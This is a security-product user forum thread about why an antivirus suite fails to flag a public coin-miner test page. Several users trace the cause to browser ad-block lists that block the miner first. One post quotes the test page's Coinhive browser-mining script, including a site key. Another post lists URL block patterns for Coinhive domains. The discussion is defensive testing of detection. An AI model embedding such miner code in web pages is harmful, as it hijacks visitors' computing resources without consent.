Jump to content
Sign in to follow this  
itman

Eset Not Detecting Test Coin Miner

Recommended Posts

Posted (edited)

http://malware.wicar.org/data/js_crypto_miner.html

This one actually does coin mining.

Also doesn't look good that SmartScreen detected it. At least now I can say I found something that SmartScreen detects that Eset doesn't.🤭

Edited by itman

Share this post


Link to post
Share on other sites

Just to be sure, I disabled SmartScreen in Edge and still no alert from Eset. Sure the same will happen in IE11. Eset always alerts prior to SmartScreen.

Running EIS ver. 11.2.42 with default settings as far as Internet Protection goes.

Share this post


Link to post
Share on other sites

Also, don't believe this is Coin Hive based since I have the following in an Eset URL block list and those didn't trigger either:

*.coinhive.com/*
*.coin-hive.com/*

Share this post


Link to post
Share on other sites

Not sure what the problem could be. No problems here:

image.png

Share this post


Link to post
Share on other sites
Posted (edited)

I don't get it either. Below is the code it is executing. The block list should have detected it regardless:

Quote

 

<html>
<script src="https://coinhive.com/lib/coinhive.min.js">
    </script><script>var miner = new CoinHive.Anonymous('VrqhGymiL9VzA7DO9YcZNzOVyNkY6tVS',       {throttle: 0.3}); 
         // Only start on non-mobile devices and if not opted-out 
         // in the last 14400 seconds (4 hours): 
         //if (!miner.isMobile() && !miner.didOptOut(14400))  {   miner.start();

         //}

</script>

</html>

 

If I click on the coinhive link, the block list detects it.

And all PUA detection settings are enabled.

Edited by itman

Share this post


Link to post
Share on other sites

@Marcos, it gets weirder.

I am using Easylist Privacy tpl in IE11. Additional in Edge, I am using AdGuard extension with both Easylist Privacy and NoCoin lists. All these will detect Coinhive. None of them triggered in this Wicar.org coin miner test.  

So I went to the AMTSO Desktop Test site and ran the PUA test. Eset performed as expected and alerted on PUA detection. So at this point, I am at a loss as to why this is happening.

Also I am running on Win 10 x(64) 1803.

Looks like Wicar.org copied the code straight from here: https://medium.com/@bitcoinloverr/100-latest-coinhive-javascript-mining-trick-monero-b525f38ce545

Share this post


Link to post
Share on other sites

Mine detects it, but I have to disable my adblock plugin to see ESET's prompt because my adblock will block the mining script before ESET kicks in.

Share this post


Link to post
Share on other sites
Posted (edited)

- Posting edited to reflect what the issue really was -

Indeed, further testing confirmed tracking protection lists used in Edge and IE11 were intercepting and blocking the connection to coinhive.com prior to Eset having a chance to do likewise. 

As far as the SmartScreen alert, it is a bogus one as most browser based SmartScreen alerts are. All SmartScreen is blocking is access to the wicar.org coin miner test web site; not any actual coin mining activity occurring there.

Edited by itman

Share this post


Link to post
Share on other sites
Posted (edited)

Will also add that I found an obscure European coinhive test web site that SmartScreen does not detects to test Eset's coin miner protection. 

Eset_Coinhive.thumb.png.f1db7bc21b22c43a618c9c4b21e08381.png

 

Edited by itman

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×